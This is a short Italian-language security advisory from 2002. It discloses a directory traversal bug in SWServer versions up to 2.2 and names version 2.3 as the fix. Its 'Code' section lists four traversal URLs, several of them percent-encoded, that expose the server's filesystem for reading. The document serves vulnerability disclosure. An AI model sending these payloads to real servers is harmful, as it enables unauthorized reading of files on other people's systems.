###################################################################### Luigi Auriemma Applicazione: SWServer http://www.geocities.com/tlhome2000/swserver.html Version: <= 2.2 Bug: Directory traversal bug Date: 28 Aug 2002 Autore: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ###################################################################### 1) Introduzione 2) Bug 3) The Code 4) Fix ###################################################################### =============== 1) Introduzione =============== Swserver e' un piccolo webserver free scritto in Java. Puo' essere considerato un semplice webserver usato per i tests o per singoli utenti che non vogliono perdere tempo con files di configurazione. ###################################################################### ====== 2) Bug ====== Il bug e' un directory traversal che permette ad un attacker di usare il server remoto come un hard-disk di sola lettura, completamente utilizzabile via browser. I caratteri da usare per sfruttare il bug sono: '\' (%5c) and '/' (%2f). ###################################################################### =========== 3) The Code =========== http://host/%2f%2e%2e%2f http://host/%5c%2e%2e%5c http://host/..\ http://host/../ ###################################################################### ====== 4) Fix ====== SWserver 2.3 ######################################################################